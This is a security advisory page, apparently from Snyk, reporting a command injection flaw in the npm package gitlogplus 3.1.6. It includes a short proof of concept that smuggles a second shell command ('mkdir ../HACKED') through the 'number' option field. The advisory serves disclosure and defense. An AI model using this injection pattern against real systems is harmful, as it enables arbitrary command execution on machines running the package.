Homepage

gitlogplus@3.1.6 vulnerabilities

Git log parser for Node.JS

  • latest version

    3.1.7

  • first published

    5 years ago

  • latest version published

    5 years ago

  • licenses detected

  • View gitlogplus package health on Snyk Advisor  (opens in a new tab)
    • Go back to all versions of this package
    Report a new vulnerability Found a mistake?

    Direct Vulnerabilities

    Known vulnerabilities in the gitlogplus package. This does not include vulnerabilities belonging to this package’s dependencies.

    How to fix?

    Automatically find and fix vulnerabilities affecting your projects. Snyk scans for vulnerabilities and provides fixes for free.

    Fix for free
    VulnerabilityVulnerable Version
    • H
    Command Injection

    gitlogplus is a Git log parser for Node.JS

    Affected versions of this package are vulnerable to Command Injection via the main functionality, as options attributes are appended to the command to be executed without sanitization.

    PoC by Rafal Janicki

    # 1. Run `npm i gitlogplus`
# 2. Run `mkdir git && git init git` (creates empty git repository as subdirectory to working directory)
# 3. Commit a file in the repository so that git log has been created
# 4. Run the below JavaScript PoC, which will create a folder HACKED in the parent directory of the new git repository

    "use strict"

const gitlog = require('gitlogplus');
const options =
{
repo: __dirname + '/git',
number: '20; mkdir ../HACKED; git log '
};

let commits = gitlog(options);
console.log(commits);

    How to fix Command Injection?

    There is no fixed version for gitlogplus.

    *
    Go back to all versions of this package